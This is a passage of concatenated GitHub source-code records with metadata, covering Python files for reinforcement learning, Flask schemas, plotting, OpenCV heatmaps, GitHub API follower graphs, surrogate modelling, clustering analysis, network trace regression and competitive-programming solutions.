high=self.rollout_length)\n\n deltas_idx.append(idx)\n\n 
self.policy.update_filter = True\n \n # self.policy.update_weights(w_policy + delta)\n pos_reward, pos_steps, pos_obs = self.rollout(shift=shift, noise=delta, sampled_t=sampled_t)\n\n # self.policy.update_weights(w_policy - delta)\n if not self.one_point: \n neg_reward, neg_steps, neg_obs = self.rollout(shift=shift, noise=-delta, sampled_t=sampled_t)\n else:\n neg_reward = 0.\n neg_steps = 0.\n neg_obs = pos_obs.copy()\n\n if not np.array_equal(pos_obs, neg_obs):\n raise NotImplementedError('Only completely deterministic environments are handled. Use one point for stochastic environments')\n\n if pos_obs is None or neg_obs is None:\n raise Exception('Observation not assigned')\n\n #if len(pos_obs) == 0 or len(neg_obs) == 0:\n # raise Exception('Observation not assigned')\n\n steps += pos_steps + neg_steps\n rollout_rewards.append([pos_reward, neg_reward])\n obs.append(pos_obs)\n\n return {'deltas_idx': deltas_idx, 'rollout_rewards': rollout_rewards, 'steps': steps, 'obs': obs}\n\n def stats_increment(self):\n self.policy.observation_filter.stats_increment()\n return\n\n def get_weights(self):\n return self.policy.get_weights()\n\n def get_filter(self):\n return self.policy.observation_filter\n\n def sync_filter(self, other):\n self.policy.observation_filter.sync(other)\n return\n","repo_name":"LAIRLAB/contrasting_exploration_rl","sub_path":"exact/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"213552069","text":"from flask_marshmallow import Marshmallow\n\nfrom .models import Customer, Project, Task\n\nma = Marshmallow()\n\n\nclass CustomerSchema(ma.ModelSchema):\n class Meta:\n model = Customer\n fields = ['id', 'name', 'created_at', '_links']\n\n created_at = ma.DateTime(dump_only=True)\n _links = ma.Hyperlinks({\n 'self': ma.URLFor('api.customers', id=''),\n 'collection': ma.URLFor('api.customers'),\n # 'projects': fields.Nested('ProjectSchema', many=True, exclude=('customer')),\n })\n\n\nclass ProjectSchema(ma.ModelSchema):\n class Meta:\n model = Project\n fields = ['id', 'name', 'created_at', 'customer']\n # fields = ['id', 'name', 'created_at', 'customer', '_links']\n\n created_at = ma.DateTime(dump_only=True)\n customer = ma.Nested(CustomerSchema, exclude=('projects'))\n # _links = ma.Hyperlinks({\n # 'self': ma.URLFor('api.project', id='', _external=True),\n # 'parent': ma.URLFor('api.projects'),\n # })\n\n # @pre_load()\n # def get_customer(self, data):\n # if isinstance(data['customer'], int):\n # data['customer'] = customer_service.find(data['customer']).__dict__\n # return data\n\n\nclass TaskSchema(ma.ModelSchema):\n class Meta:\n model = Task\n fields = ['id', 'name', 'start', 'end', '_links']\n\n project = ma.Nested('ProjectSchema', exclude=('tasks'))\n # _links = ma.Hyperlinks({\n # 'self': ma.URLFor('api.task', id='', _external=True),\n # 'parent': ma.URLFor('api.tasks'),\n # })\n\n\ncustomer_schema = CustomerSchema()\nproject_schema = ProjectSchema()\ntask_schema = TaskSchema()\n","repo_name":"barthuttinga/clockit-api","sub_path":"clockit_api/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43144297715","text":"# https://ac.nowcoder.com/acm/contest/66651/A\n\nn = int(input())\nlst = list(map(int, input().split()))\nlst.sort()\ncnt = 0\nfor i in range(len(lst) - 1):\n if lst[i + 1] - lst[i] <= 1:\n 
cnt += 1\n else:\n break\nif cnt < n - 1:\n print(\"NO\")\nelse:\n print(\"Yes\")\n","repo_name":"xingwenzan/PythonProgramFiles","sub_path":"算法/Other/教科书般的亵渎.py","file_name":"教��书般的亵渎.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"20078672141","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 15 22:05:57 2019\n\n@author: ankusmanish\n\"\"\"\n\n#Write a program to draw a scatter plot of “day” against “total bill” for a dataset given in a url \n\nimport matplotlib.pyplot as plt\nimport seaborn as sea\nimport pandas as pd\n\ndata = pd.read_csv('tips.csv')\n\nx = data['day']\ny = data['total_bill']\n\nplt.figure(figsize = (8,6))\nsea.scatterplot(x,y, hue = x)\nplt.xlabel('Day')\nplt.ylabel('Total Bill')","repo_name":"AnkusManish/Machine-Learning","sub_path":"Week4/Seaborn/Scatterplot/Program_1.py","file_name":"Program_1.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36509095300","text":"\"\"\"\n @FileName:DetectImage.py\n @Author:yikai yang\n @Date:2023/1/12\n @Desc:Null\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, Normalize\nfrom scipy.stats import multivariate_normal\nimport queue\n\nCOLOUR_ROUTE = (255, 0, 0)\nRADIOS_ROUTE = 10\n\n\nclass DetectImage():\n\n def __init__(self, draw_list, frame_size, route):\n\n self.draw_list = draw_list\n self.frame_size = frame_size\n self.route = route\n self.queueList = [queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue(),\n queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue()]\n\n def __init__(self):\n\n self.draw_list = []\n self.frame_size = ()\n self.route = []\n\n def set_draw_list(self, draw_list):\n\n self.draw_list = draw_list\n\n def set_frame_size(self, frame_size):\n\n self.frame_size = frame_size\n\n def set_route(self, route):\n\n self.route = route\n\n def draw_route(self, img, before_point, route_list, permission):\n \"\"\"\n draw route from a finger\n\n :argument img to draw, before point, route list, which finger\n :return img\n \"\"\"\n for single_position in route_list:\n if not single_position:\n\n continue\n else:\n single_position = single_position[permission]\n if before_point is None:\n before_point = single_position\n else:\n cv2.line(img, (before_point[1], before_point[2]), (single_position[1], single_position[2]),\n COLOUR_ROUTE, RADIOS_ROUTE)\n before_point = single_position\n\n return img, before_point\n\n def draw_already(self):\n \"\"\"\n draw already pass area\n\n :argument left hand data, right hand data, which finger to draw, frame\n :return img\n \"\"\"\n img_blank = np.zeros((int(self.frame_size[1]), int(self.frame_size[0]), 3), np.uint8)\n img_blank[:] = [255, 255, 255]\n before_point = None\n for i in range(len(self.draw_list)):\n if self.draw_list[i]:\n img_blank, before_point = self.draw_route(img_blank, before_point, self.route, i)\n\n return img_blank\n\n def calcutate_normal(self, img, rout_list, pos, finger):\n \"\"\"\n generate normal distribution\n\n :argument left hand data, right hand data, which finger to draw, frame\n :return img\n \"\"\"\n for single_position in rout_list:\n\n if not single_position:\n\n continue\n else:\n single_position = single_position[finger]\n\n rv = multivariate_normal([single_position[1], single_position[2]], [[50, 0], [0, 
50]])\n Z = rv.pdf(pos)\n img += Z\n\n return img\n\n def hot_draw(self):\n \"\"\"\n generate heat map\n\n :argument left hand data, right hand data, frame, which finger to draw\n :return img\n \"\"\"\n # Generate mockup data\n h = self.frame_size[1]\n w = self.frame_size[0]\n x = np.arange(w)\n y = np.arange(h)\n X, Y = np.meshgrid(x, y)\n\n pos = np.dstack((X, Y))\n zombies = np.zeros((int(h), int(w)), np.float64)\n\n for i in range(len(self.draw_list)):\n if self.draw_list[i]:\n zombies = self.calcutate_normal(zombies, self.route, pos, i)\n\n zombies /= np.max(zombies)\n # Generate custom colormap with alpha channel,\n # cf. https://stackoverflow.com/a/37334212/11089932\n cmap = cm.autumn_r\n c_cmap = cmap(np.arange(cmap.N))\n c_cmap[:, -1] = np.linspace(0, 1, cmap.N)\n c_cmap = ListedColormap(c_cmap)\n\n # Generate heatmap, cf. https://stackoverflow.com/a/31546410/11089932\n norm = Normalize(vmin=zombies.min(), vmax=zombies.max())\n heatmap = c_cmap(norm(zombies))\n heatmap = cv2.cvtColor(np.uint8(heatmap * 255), cv2.COLOR_RGBA2BGRA)\n return heatmap\n\n def judge_in_zoom(self, contours, x, y):\n \"\"\"\n generate in heat zone and out heat zone time\n\n :argument wheather in the zone, finger data, coord zone, time stamp, time start into the zone list, time out into the zone list\n :return time start into the zone list, time out into the zone list\n \"\"\"\n\n for contour in contours:\n result = cv2.pointPolygonTest(contour, (x, y), False)\n if result >= 0:\n M = cv2.moments(contour)\n\n # Calculate the centroid coordinates\n cx = int(M[\"m10\"] / M[\"m00\"])\n cy = int(M[\"m01\"] / M[\"m00\"])\n\n return cx, cy\n\n return -1, -1\n\n def calculate_hot(self, image):\n \"\"\"\n generate in heat zone and out heat zone time list\n\n :argument image, left finger data, right finger data, which finger to draw\n :return time start into the zone list, time out into the zone list\n \"\"\"\n heatmap = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # Convert the image to grayscale\n gray_heatmap = cv2.cvtColor(heatmap, cv2.COLOR_RGB2GRAY)\n\n # Apply a threshold to identify the heavy color areas\n _, thresholded = cv2.threshold(gray_heatmap, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n\n # Find the contours of the thresholded areas\n contours, _ = cv2.findContours(thresholded, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n isInZoom = [False, False, False, False, False, False, False, False, False, False]\n\n for i in range(len(self.draw_list)):\n\n if self.draw_list[i] and not isInZoom[i]:\n x, y = self.judge_in_zoom(contours, x, y)\n if x != -1:\n self.queueList[i].put((x, y))\n\n for i in range(len(self.draw_list)):\n\n if self.draw_list[i]:\n self.draw_route_hot(self.queueList[i], contours)\n\n return contours\n\n def draw_route_hot(self, queue, img):\n\n \"\"\"\n generate route of heat map\n\n :argument heap\n :return img\n \"\"\"\n last_one = queue.get()\n\n while queue.size() != 0:\n this_one = queue.get()\n\n cv2.line(img, (last_one[0], last_one[1]), (this_one[0], this_one[1]),\n COLOUR_ROUTE, RADIOS_ROUTE)\n last_one = this_one\n\n return img\n","repo_name":"big97kai/FingerDetect","sub_path":"Functions/DetectImage.py","file_name":"DetectImage.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9251338658","text":"import requests\r\nfrom github import Github\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\naccessTokenFile = open('token.txt', 'r')\r\ntoken = 
accessTokenFile.readline()\r\naccessTokenFile.close()\r\ng = Github(token)\r\nrelationGraph = nx.Graph()\r\n\r\n\r\ndef main():\r\n loopProgram = 1\r\n exitCondition = 1\r\n while loopProgram:\r\n while exitCondition:\r\n print(\"Enter the username of the user you would like to look at:\")\r\n user = input()\r\n r = requests.get('https://api.github.com/users/' + user)\r\n if '404' in r:\r\n print(\"That didn't seem to be a valid user, please try again\")\r\n else:\r\n exitCondition = 0\r\n print(\"User found!\")\r\n\r\n exitCondition = 0\r\n user = g.get_user(user)\r\n relationGraph.add_node(user.name, repos= user.get_repos().totalCount ,followers= user.get_followers().totalCount, following= user.get_following().totalCount)\r\n print(\"Would you like to see this users Repositories ('Y' for Yes, anything else for No)\")\r\n if input() == 'Y':\r\n for repo in user.get_repos():\r\n if repo.description != None:\r\n print(repo.name + \": \" + repo.description)\r\n else:\r\n print(repo.name + \": No Desciption\")\r\n else:\r\n print(\"'Y' Not detected.\")\r\n if user.get_repos().totalCount == 0:\r\n print(\"The user had no repositories.\")\r\n if user.get_projects().totalCount == 0:\r\n print(\"The user had no projects.\")\r\n print(\"The user had\", user.get_followers().totalCount, \"followers and followed\", user.get_following().totalCount, \"people.\")\r\n print(\"Would you like to see the Users followers and their relevant statistics? ('Y' for Yes, anything else for No)\")\r\n print(\"This step may take a while no matter the choice.\")\r\n if input() == 'Y':\r\n if user.get_followers().totalCount == 0:\r\n print(\"The user had no followers and followed \", user.get_following().totalCount, \" people.\")\r\n else:\r\n print(\"Their followers were:\")\r\n for follower in user.get_followers():\r\n print(follower.name, \"who has\", follower.get_followers().totalCount, \"followers and\", follower.get_repos().totalCount, \"repos\")\r\n relationGraph.add_node(follower.name, repos= follower.get_repos().totalCount ,followers= follower.get_followers().totalCount, following= follower.get_following().totalCount)\r\n relationGraph.add_edge(user.name, follower.name, relationship=\"Follower\")\r\n else:\r\n for follower in user.get_followers():\r\n relationGraph.add_node(follower.name,\r\n repos=follower.get_repos().totalCount,\r\n followers=follower.get_followers().totalCount,\r\n following=follower.get_following().totalCount)\r\n relationGraph.add_edge(user.name, follower.name, relationship=\"Follower\")\r\n plt.plot\r\n pos = nx.spring_layout(relationGraph)\r\n color = range(20)\r\n print(\"Would you like to see the graph comparison based followers, following, or repos?('repo' for repository data, 'followers' for followers and 'following' for following)\")\r\n graphChoice = input()\r\n if graphChoice == 'repo' or graphChoice == 'followers' or graphChoice == 'following':\r\n d = nx.get_node_attributes(relationGraph, graphChoice)\r\n else:\r\n print(\"Choice didn't match any options. 
Default option of repositories chosen\")\r\n d = nx.get_node_attributes(relationGraph, 'repos')\r\n options = {\r\n \"node_color\": \"#A0CBE2\",\r\n \"edge_color\": \"gray\",\r\n \"width\": 2,\r\n \"edge_cmap\": plt.cm.Blues_r,\r\n \"with_labels\": True,\r\n \"node_size\": [v*100 for v in d.values()],\r\n }\r\n nx.draw(relationGraph, pos, **options)\r\n plt.show()\r\n else:\r\n print(\"'Y' not detected.\")\r\n print(\"Program complete!\")\r\n exit()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Conall-Tuohy/3rdYearCollege","sub_path":"SoftwareEngineering/GithubAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3064857827","text":"import json\n\n\nclass DynAmountLineAsset:\n \"\"\"\n Quantité d'actif du portefeuille de composition historique\\n\n asset: Actif\\n\n quantity: Quantité de l'actif\n \"\"\"\n\n def __init__(self, asset_: int, quantity_: float):\n\n if not asset_:\n raise Exception(\"A DynAmountLineAsset must have an asset.\")\n\n if not quantity_:\n raise Exception(\"A DynAmountLineAsset must have a currency.\")\n\n self.asset = asset_\n self.quantity = quantity_\n\n\ndef jsonToDynAmountLineAsset(jsonAsset):\n dictionary = None\n\n if type(jsonAsset) is str:\n dictionary = json.loads(jsonAsset)\n elif type(jsonAsset) is dict:\n dictionary = jsonAsset\n\n asset = DynAmountLineAsset(dictionary['asset'], dictionary['quantity'])\n\n return asset\n","repo_name":"grassetg/DolphinBillionaires","sub_path":"models/dynAmountLineAsset.py","file_name":"dynAmountLineAsset.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1445114768","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 3 14:31:58 2019\n\n@author: miguel\n\"\"\"\ncount = []\na = []\nwith open('names.txt','r') as names:\n for linea in names:\n linea = str(linea)\n linea = linea.rstrip('\\n')\n a=a.append(linea)\n # count = count.append(user.count(linea))\n \n","repo_name":"mike9739/tesis","sub_path":"contador.py","file_name":"contador.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6342483125","text":"import pyomo.environ as pyo\nfrom idaes.surrogate.pysmo.polynomial_regression import *\nfrom idaes.surrogate.pysmo import kriging\nimport pandas as pd\nimport numpy as np\nimport os\n\n\ndef main():\n def branin_function(x1, x2):\n pi = 3.1417\n t1 = (x2 - (5.1 * x1 * x1 / (4 * pi * pi)) + (5 * x1 / pi) - 6) ** 2\n t2 = (10 * (1 - 1/(8 * pi))*np.cos(x1))\n y = t1 + t2 + 10\n return y\n\n # Create 20 random samples for training, 100 for testing\n np.random.seed(100)\n ndata = 25\n nval = 100\n x = np.random.uniform([-5, 0], [10, 15], (ndata, 2))\n xval = np.random.uniform([-5, 0], [10, 15], (nval, 2))\n y = branin_function(x[:, 0], x[:, 1])\n yval = branin_function(xval[:, 0], xval[:, 1])\n xy_data = np.concatenate((x, y.reshape(y.size, 1)), axis=1)\n\n # Train polynomial model with basis functions similar to ALAMO example: 4th order mononomials, exponents, and first and second degree interaction terms\n train_obj = PolynomialRegression(xy_data, xy_data, maximum_polynomial_order=4, multinomials=1, training_split=0.8, number_of_crossvalidations=5, overwrite=True)\n p = train_obj.get_feature_vector()\n train_obj.set_additional_terms([p[0] * p[0] 
* p[1], p[0] * p[1] * p[1], p[0] * p[0] * p[1] * p[1], pyo.exp(p[0]), pyo.exp(p[1])])\n train_obj.training()\n\n # Evaluate model performance as R2\n y_predict = train_obj.predict_output(xval)\n r2 = kriging.KrigingModel.r2_calculation(yval, y_predict)\n print('\\nThe R^2 value for the polynomial over the 100 off-design points is', r2)\n\n # Print Pyomo expression\n m = pyo.ConcreteModel()\n m.x = pyo.Var([1, 2])\n print(train_obj.generate_expression([m.x[1], m.x[2]]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IDAES/examples-pse","sub_path":"src/Examples/SurrMod/PySMO/polyregression_branin_function.py","file_name":"polyregression_branin_function.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"5812448044","text":"import numpy as np\n\nfrom sklearn.cluster import MiniBatchKMeans\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy.cluster.hierarchy import ward, cut_tree\n\n\ndef compare_rep_to_label(rep, y, kind='knn'):\n \"\"\"Compare a representation, rep, to a set of labels, y. Fits a k-means\n model to the representation where k is the number of labels. Finds the\n best match between the clusters and labels and compares them.\n\n Parameters\n ----------\n rep: ndarray (n_samples, n_features)\n Representation of the data.\n y: ndarray (n_samples, ) int\n Labels for data.\n\n Returns\n -------\n cluster_idx: ndarray, int (n_classes,)\n Indices of clusters to match with labels.\n label_idx: ndarray, int (n_classes,)\n Indices of labels to match with clusters.\n cost_matrix: ndarray (n_classes, n_classes)\n Cost matrix under original orderings.\n new_cost_matrix: ndarray (n_classes, n_classes)\n Cost matrix under aligned, sorted orderings.\n new_y: ndarray, int (n_classes,)\n Labels under the best cluster labelling.\n accuracy: float\n Labels accuracy under the best cluster labelling.\n null_accuracy: float\n Labels accuracy under a permutation of the best cluster labelling.\n \"\"\"\n if kind not in ['ward', 'knn', 'miniknn']:\n raise ValueError\n dim = y.max() + 1\n\n if kind == 'ward':\n Z = ward(rep)\n yk = cut_tree(Z, n_clusters=dim)\n elif kind == 'knn':\n km = MiniBatchKMeans(dim)\n km.fit(rep)\n yk = km.labels_\n else:\n raise ValueError\n\n cost_matrix = np.zeros((dim, dim))\n for ii in range(dim):\n e1 = yk == ii\n for jj in range(dim):\n e2 = y == jj\n intersect = np.sum(np.logical_and(e1, e2))\n union = np.sum(np.logical_or(e1, e2))\n cost_matrix[ii, jj] = -float(intersect) / union\n row_idx, col_idx = linear_sum_assignment(cost_matrix)\n new_cost_matrix = cost_matrix[row_idx][:, col_idx]\n idxs = np.argsort(np.diag(new_cost_matrix))\n new_cost_matrix = new_cost_matrix[idxs][:, idxs]\n\n new_y = np.zeros_like(y)\n for ii in range(dim):\n new_y[yk == row_idx[ii]] = col_idx[ii]\n accuracy = (new_y == y).mean()\n\n null = []\n for ii in range(10):\n null.append(np.equal(y, np.random.permutation(new_y)).mean())\n null_accuracy = np.mean(null)\n\n return (row_idx, col_idx,\n cost_matrix, new_cost_matrix,\n new_y, accuracy, null_accuracy)\n","repo_name":"BouchardLab/HangulFontsDatasetGenerator","sub_path":"hangul_analysis/hangul_analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13116204403","text":"\n#imports\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport 
math\n\nimport trace_file_processor as tfp\nimport plotting_analysis as pt\n\n#for the customized linear least squares\nfrom support import *\n\n#for customized probabilistic linear least squares\nfrom probabilistic_regression_support import *\n\n\n### IMPORTANT CONSTANTS ###\n\nDELAY_FACTOR = 3.07\nTICK_TIME = 60\n\n#To index each trial dataset\nTRIAL_1 = 0\nTRIAL_2 = 1\nTRIAL_3 = 2\nTRIAL_4 = 3\nTRIAL_5 = 4\n\nTRIALS = 1\n\n#To index labels and proccessed datasets\nLABELS = 0\nPROCESSED_DATASETS = 1\nAVERAGE = TRIALS #Since processed dataset array will have labels + trials = 1 + TRIALS size\n\n#To index features in datasets\nRTT_GRAD_INDEX = 0\nTHROUGHPUT_INDEX = 1\nQUEUEING_DELAY_INDEX = 2\nINTER_ARRIVAL_INDEX = 3\n\n\n#If we want to normalize\nNORMALIZE=False\n\npath = 'TRAIN-DATA/'\ndirectories = ['ATT-LTE', 'TMobile-LTE', 'Verizon-LTE', 'TMobile-UMTS', 'Verizon-EVDO']\n\ndef get_minimum_length_of_data(data):\n \n N = len(data)\n\n minimum_length = len(data[0][0])\n \n #indicates which trial in first entry and which feature in second entry\n where = (0,0)\n \n #Defining constants for readibility\n WHICH_TRIAL = 0\n WHICH_FEATURE = 1\n \n #Find trial of minimum length for processing\n for i in range(0, N):\n \n rtt_grad_data, throughput, queue_delay, inter_arrival = data[i]\n \n if (len(rtt_grad_data[1:]) < minimum_length):\n \n minimum_length = len(rtt_grad_data[1:])\n where = (i,0)\n \n if (len(throughput[1:]) < minimum_length):\n \n minimum_length = len(throughput[1:])\n where = (i,1)\n \n if (len(queue_delay[1:]) < minimum_length):\n \n minimum_length = len(queue_delay[1:])\n where = (i,2)\n \n if (len(inter_arrival[1:]) < minimum_length):\n \n minimum_length = len(inter_arrival[1:])\n where = (i,3)\n \n return data[where[WHICH_TRIAL]][where[WHICH_FEATURE]], minimum_length\n\n\n\n#Processing the input datasets\n\ndef process_input_datasets(data, minimum_length):\n \n N = len(data)\n \n datasets = []\n \n average = []\n \n for i in range(0, N):\n \n rtt_grad_data, throughput, queue_delay, inter_arrival = data[i]\n \n #Drop tick indicator\n rtt_grad_data = rtt_grad_data[1:]\n throughput = throughput[1:]\n queue_delay = queue_delay[1:]\n inter_arrival = inter_arrival[1:]\n \n \n \n while (len(throughput) > minimum_length):\n throughput = throughput[:len(throughput) - 1]#Ensure they match\n \n while (len(rtt_grad_data) > minimum_length):\n rtt_grad_data = rtt_grad_data[:len(rtt_grad_data) - 1]#Ensure they match\n \n while (len(queue_delay) > minimum_length):\n queue_delay = queue_delay[:len(queue_delay) - 1]#Ensure they match\n \n while (len(inter_arrival) > minimum_length):\n inter_arrival = inter_arrival[:len(inter_arrival) - 1]#Ensure they match\n \n \n #Each row holds a single vector state at consecutive times \n #X = np.hstack((rtt_grad_data[:,None], throughput[:,None], queue_delay[:,None], inter_arrival[:,None]))\n \n #We want to standardize the features for fair comparison of importance later on\n X_pre = np.hstack((rtt_grad_data[:,None], queue_delay[:,None], inter_arrival[:,None]))\n \n u = np.mean(X_pre, axis=0)\n sigma = np.std(X_pre, axis=0)\n \n if NORMALIZE:\n \n X_pre = (X_pre - u)/sigma\n \n X = np.hstack((throughput[:,None], X_pre))\n \n # For computing average later on\n if len(average) > 0:\n \n average = np.vstack((average, [X]))\n else:\n average = np.array([X])\n \n #print(np.std(X[:,2]))\n \n datasets.append(X)\n \n average = np.mean(average, axis=0)\n \n #Average of all trials will be at the end of the dataset list\n datasets.append(average)\n \n return 
datasets\n\n\ndef process_target_trace(trace_name, DELAY_FACTOR, tick_time, sample_dataset):\n \n #Holds actual link capacity at a particular time\n y, _ = tfp.process_trace(trace_name, ms_per_bin=tick_time)\n\n #To ensure we have the \n START_INDEX = int(math.floor(DELAY_FACTOR/(tick_time / 1000)))\n END_INDEX = pt.get_corresponding_trace_length(y, np.concatenate(([tick_time], sample_dataset)))\n \n #print(\"start: {} \\n\".format(START_INDEX))\n #print(\"end: {} \\n\".format(END_INDEX))\n\n y = y[START_INDEX:END_INDEX + 1] #Ensure we include the last element as we want to 'forecast' (end at time k + 1, whereas\n #the input data sets end at time k)\n\n #Dropping the first element of y means that it will start at time t + 1, whereas the input datasets start at\n #time t. This will allow us to consider what to expect for time t + 1, given the curren time t. We will\n #start by learning the transformation based on this\n\n y = y[1:]\n\n return np.array(y)\n\n\n#Doing analysis\n\ndef find_transformations(datasetss, y):\n \n N = len(datasetss)\n \n models = []\n \n for i in range(0, N):\n \n #Arbitrary regularization\n alpha = 120\n \n X = datasetss[i]\n\n w, b = fit_linreg_gradopt(X, y, alpha)\n \n models.append((w,b))\n \n return models\n\n\n\"\"\" \n\nWill return a dictionary that contains all pairs of datasets for each trace.\nThe dictionary is indexed using the trace name and it holds an array for each\ntrace containing [(rtt_grad_data_run_1, throughput_data_run_1), ...]. Each tuple\nrepresents a pair of data that can be processed into a dataset for training.\n\n\"\"\"\n\ndef get_all_trial_datasets():\n \n N = TRIALS\n data = {}\n\n for direct in directories:\n \n dataset = []\n \n for i in range(1, N + 1):\n \n #read in all the features that are relevant\n inter_arrival = pt.read_data(path + direct + '/inter_arrival_data_run_{}.csv'.format(i))\n queue_delay = pt.read_data(path + direct + '/queue_delay_data_run_{}.csv'.format(i))\n rtt_grad_data = pt.read_data(path + direct + '/rtt_grad_data_run_{}.csv'.format(i))\n throughput = pt.read_data(path + direct + '/throughput_data_run_{}.csv'.format(i))\n \n #pre-processing to ensure no nan values present - treated as 0\n rtt_grad_data = pt.pre_process_data(rtt_grad_data)\n throughput = pt.pre_process_data(throughput)\n \n #NOTE: First value for these datasets is always nan. Might be a bug during collection.\n # We will treat it as zero here, but we might want to remove the datapoint altogether\n #\n # Was a bug in the data collection framework that was fixed\n inter_arrival = pt.pre_process_data(inter_arrival)\n queue_delay = pt.pre_process_data(queue_delay)\n \n dataset.append((rtt_grad_data, throughput, queue_delay, inter_arrival))\n \n\n data[direct] = dataset\n \n return data\n\n\"\"\" \n\nWill return a dictionary that contains the proccessed datasets for all\ntrials for each trace. The trace name is used to access the dictionary\nto get a tuple (y, processed_datasets).\n\nThe entry y in the tuple is the true link capacity, whereas the processed_datasets\nis an array containing the X train data for each trial (starts at trial 1)\n\n\"\"\"\ndef get_all_trial_processed_datasets(data):\n \n processed_train_data = {}\n \n for direct in data:\n \n dataset = data[direct]\n \n #IMPORTANT: THIS IS THE ISSUE. 
WE CANNOT HAVE TRIALS OF DIFFERENT LENGTHS (USING DIFF TICK TIMES)\n # This is because otherwise this min function will give us the minimum one irrespective of tick time used\n min_trace, min_data_length = get_minimum_length_of_data(dataset)\n \n processed_datasets = process_input_datasets(dataset, min_data_length)\n\n y = process_target_trace('traces/' + direct + '-driving.up', DELAY_FACTOR, TICK_TIME, min_trace[1:])\n \n #Ensure nothing has gone wrong during the processing\n \n #print(len(y))\n #print(len(processed_datasets[0]))\n \n assert(len(y) == len(processed_datasets[0]))\n\n processed_train_data[direct] = (y, processed_datasets)\n \n return processed_train_data\n\n\ndef get_all_trials_models(processed_train_data, ):\n \n models = {}\n \n for direct in processed_train_data:\n \n labels, train_data = processed_train_data[direct]\n \n models[direct] = find_transformations(train_data, labels)\n \n return models\n\n\n#Now, examining how the transformation looks\n\ndef plot_transformation(model, X, Xnew, y):\n \n w = model[0]\n b = model[1]\n \n predicted = Xnew@w + b #These hold the predictions for times t+1 -> k+1\n x_coord = [x*(TICK_TIME / 1000) for x in np.arange(len(y))]\n\n plt.figure(figsize=(18, 8))\n plt.grid()\n plt.plot(x_coord, y, color=\"violet\", label=\"actual hidden state\")\n plt.plot(x_coord, X[:,1], color=\"royalblue\", label=\"observed\")\n plt.plot(x_coord, predicted, color=\"green\", label=\"Predicted\")\n\n plt.legend()\n plt.show()","repo_name":"Fadi-B/ug4-project","sub_path":"data_analyzer.py","file_name":"data_analyzer.py","file_ext":"py","file_size_in_byte":9381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17699918679","text":"'''lots of failed attempts here. 
I ultimately missed the important observation of len <= 7.'''\nfrom collections import defaultdict as dd\nfrom functools import lru_cache\nfor t in range(int(input())):\n n = int(input()) # length of s\n s = input().strip() # string containing only 'a' 'b' and 'c'\n ''' find the length of the smallest substring where\n - length >= 2\n - 'a' appears more often than 'b'\n - 'a' appears more often than 'c'\n '''\n '''\n sat = {c:[0] for c in 'abc'}\n a_positions = []\n for i,c in enumerate(s):\n if c == 'a': a_positions.append(i)\n for k in sat: sat[k].append(sat[k][-1]+(c==k))\n INVALID = 10**7\n @lru_cache(maxsize=None)\n def dp(start, end):\n while start < end and s[start] != 'a': start += 1\n while start < end and s[end-1] != 'a': end -= 1\n if end-start < 2: return INVALID\n ctr = {k:sat[k][end]-sat[k][start] for k in sat}\n if ctr['a'] < 2: return INVALID\n # remove left, remove right, or try this one.\n mi = dp(start+1,end)\n mi = min(mi, dp(start,end-1))\n if ctr['b'] < ctr['a'] and ctr['c'] < ctr['a']:\n mi = min(mi, end-start)\n return mi\n res = dp(0,n)\n print(-1 if res == INVALID else res)\n '''\n \"\"\"\n i, length = 0, 2\n ctr = dd(int)\n for c in s[:2]: ctr[c] += 1\n mi = float('inf')\n while i+length < n:\n shrink = False\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']: # shrink left\n mi = min(mi, length)\n shrink = True\n if shrink or s[i] != 'a' and length > 2:\n ctr[s[i]] -= 1 # remove left char\n length -= 1\n i += 1\n else: # grow right\n length += 1\n ctr[s[i+length-1]] += 1\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']:\n mi = min(mi, length)\n \n if mi == float('inf'): print('-1')\n else: print(mi)\n \"\"\"\n '''\n for length in range(2,n+1):\n ctr = dd(int)\n for i in range(length): ctr[s[i]] += 1\n for i in range(n-length):\n if ctr['a'] > 